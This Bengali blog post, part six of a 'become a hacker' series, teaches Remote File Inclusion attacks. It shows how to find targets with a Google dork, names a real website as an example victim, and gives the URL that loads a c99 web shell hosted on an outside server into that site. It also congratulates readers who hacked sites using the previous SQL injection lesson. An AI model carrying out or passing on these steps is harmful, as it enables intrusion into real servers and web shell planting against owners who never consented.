Tuesday, July 28, 2015

হতে চান একজন হ্যাকার? তা হলে পর্ব গুলা অবশ্যই দেখুন!! {আর নিজেকে তৈরি করেন একজন হ্যাকার হিসাবে} (পর্ব ০৬)

৬ষট পর্ব শুরু করার আগে কিছু কথাঃ

আমরা সবাই হ্যাকিং জিনিষ টার উপর একটু বেশি ইন্টারেস্ট?আর আমি আপনাদের চেষ্টা করব ১০ পর্বের মাধ্যমে কিছু টা হলে হ্যাকিং শিখানোর! আর আমি কোন বড় মাপের হ্যাকার নই কিংবা হ্যাকিং সম্পর্কে বেশি কিছু জানিও না!যা জানি তা আপনাদের কে বুঝনোর চেষ্টা করব (আমার মত করে)আর এটা শুদু মাত্র নতুন যারা হ্যাকিং জগত শুরু করতে চায় তাদের জন্য ! তাই অভিজ্ঞ ভাইয়েরা ভুল ধরিয়ে দিবেন?

আমরা ১ম ও ২য়, পর্বে আলোচনা করেছিলাম যে হ্যাকিং কি, হ্যাকার কারা,হ্যাকার কয় ধরনের? এবং হ্যাকার হতে আমাদের কী কী লাগবে!
এবং ৩য় পর্বে আমরা জেনেছিলাম হ্যাকার দের জন্য কয়েকটা ফোরাম, হ্যাকিং রিসোর্স! এবং কয়েকটা মুভি দিয়েছিলাম আশা করি অনেক এ দেখেছেন? আর দেখে অনেক কিছু শিখছেন? এবং ৪র্থ পর্বে আমরা আলোচনা করেছিলাম আইপি সম্পর্কে? আশা করি সবাই বুঝতে পেরেছেন?
আমরা আগের পর্ব গুলাতে এইটা ক্লিয়ার হয়েছি যে হ্যাকিং কি? হ্যাকার কারা? হ্যকার হতে কি কি লাগবে? একজন হ্যকার কি করলে সফল হয়! আর কি করলে পুলিশ এর হাতে দরা পরে? এবং ৫ম পর্বে শিখেছিলাম হ্যাকিং এর একটা মেথুড sql সম্পর্কে! অনেক প্রাথমিক ভাবে হ্যাক করেছেন কিছু সাইট! যারা হ্যাক করতে সক্ষম হয়েছেন তাদেরকে অভিনন্দন। আর যারা পারেন নি তারা আবার বুজে চেস্টা করেন! সফল হবেন 😀 ইনশাআল্লাহ্‌।
আজকের পর্বে দেখাব হ্যাকিং এর আরেকটি এবং অন্যতম  ম্যাথড RFI বা (Remote file inclusion) এর কাজ  😮 

প্রথম RFI বা Remote file inclusion কী? 

Remote file inclusion হ্যাকিং, এর সংক্ষিপ রুপ হল   RFI হ।  এটি অনন্যা হ্যাকিং ম্যাথডের মধ্যে অন্যতম হ্যাকিং ম্যাথড। সকল হ্যাকিং  পদ্ধতির মতো এই পদ্ধতিতেও আপনাকে ওয়েবসাইটের vulnerability বের করতে হবে। এই vulnerability এর মাধ্যমে আপুনি একটি ওয়েব সার্ভারে Remote file inclusion যুক্ত করতে পারবেন। 

এখন সাইট vulnerable কিনা তা বুজবেন কিভাবে?

http://www.yourtargetsite.com/index.php?page=Anything (এইটা দেখেন)
এখন গুগল ডক ধরকার তাই না?
গুগল ডক “inurl:index.php?page=” এখন এই গুগল ডক গুগলে লিখে সার্চ দেন! তাহলে গুগল আপনাকে index.php?page=” এই সম্পর্কের যত সাইট আছে তা এনে দিবে (উপহার হিসবে) 😀
এখন সার্চ রিজাল্ট থেকে যে কোন একটা সাইটে প্রবেশ করুন। যেমন আমি পেয়েছি এই সাইট http://www.tolvan.com/
এখন এই সাইটে ওয়েব সাইটে RFI ইঞ্জেকশান দেয়া যাবে কি না? তা কিভাবে চ্যাক করবেন?
যে ভাবে চ্যাক করবেনঃhttp://www.tolvan.com/v2/index.php?page=http://www.greenweb.com.bd
মানে কি বুজতে পেরেছেন? মানে আপনার সার্চ করা যে কোন সাইট এর শেষে যে কোন একটা সাইট লিংক দেন। যদি উক্ত ওয়েবসাইটটি অন্য  খোলে তাহলে বুঝবেন যে এই ওয়েব সাইটে RFI ইঞ্জেকশান দেয়া যাবে।
এখন শেল আপলোড করার পালাঃ-
শেল আপলোড করে করবেন, কারন আপুনি যে সাইট হ্যাক করেছেন তার প্রমান দিবেন।
সাধারণত বেশিভাগ হ্যাকার c99 shel তে শেল আপলোড করে। আপুনি ও আপলোড করতে পারেন। আমি দেখাব কিভাবে c99 shel শেল আপলোড করবেন। আবার কোন কোন হ্যাকার r57 shell আপলোড করে। যার যেখানে ইচ্ছা।
সেল আপলোড করতে হলে যে কোন একটা হোস্টিং সাইটে সেল আপলোড করতে হবে যেমন, 110mb.com সহ আর অনেক সাইট। 
এখন মনে করেন আমি 110mb.com সাইটে সেল আপলোড করলাম। তাইলে লিংক এই রকম হবে
http:// 110mb.com /tjusthack/c784shell.php? 
এখন একটা কমান্ড দিব
http://www.tolvan.com/v2/index.php??pagehttp:// 110mb.com /tjusthack/c784shell.php? 

নোটঃ লিংকের শেষে “ ? ” এটা দিতে হবে! নাইলে আপনার লিংক কাজ করবে না! 
ব্যাস কাজ শেষ  8-O

 কিছু পরামর্শঃ

পর্যায় ক্রমে সবগুলো টিউটোরিয়াল খুব ভালোভাবে অধ্যায়ন করতে হবে। নিজে নিজে এগুলো অনুশিলনের চেষ্টা করতে হবে। কথনই নিজে অরক্ষিত থেকে হ্যাকিং চেষ্টা চালাবেন না। মনে রাখবেন কিছু কিছু টিউটোরিয়াল হবে অনৈতিক তাই সেগুলোর যেকোন দায়ভার আমি  বহন করব না।
আপনার লক্ষ যদি হয় ১০ কিলোমিটার আপুনি লক্ষ টিক করুন ১০ মিটার আর এই ১০ মিটার আস্তে আস্তে করেন দেখবেন কখন ১০০মিটার হয়ে গেছে বুঝতে পারবেন না !টিক তেমন আপুনি যদি প্রথম যদি মনে করেন আপনি হ্যাক করে ফেলবেন ফেসবুক!!! তা হলে আপুনি ঘোড়ার ডিম হ্যাক করবেন!!
আপনাকে আস্তে আস্তে শুরু করতে হবে এবং প্রাথমিক ভাবে !! দেখবেন আপনি একদিন বড় হবেন (নিশ্চিত) :-P
 কোন সমস্যা হলে আমায় পাবেন  ফেইসবুক এ- এখানে ক্লিক করুন। 

No comments:

Post a Comment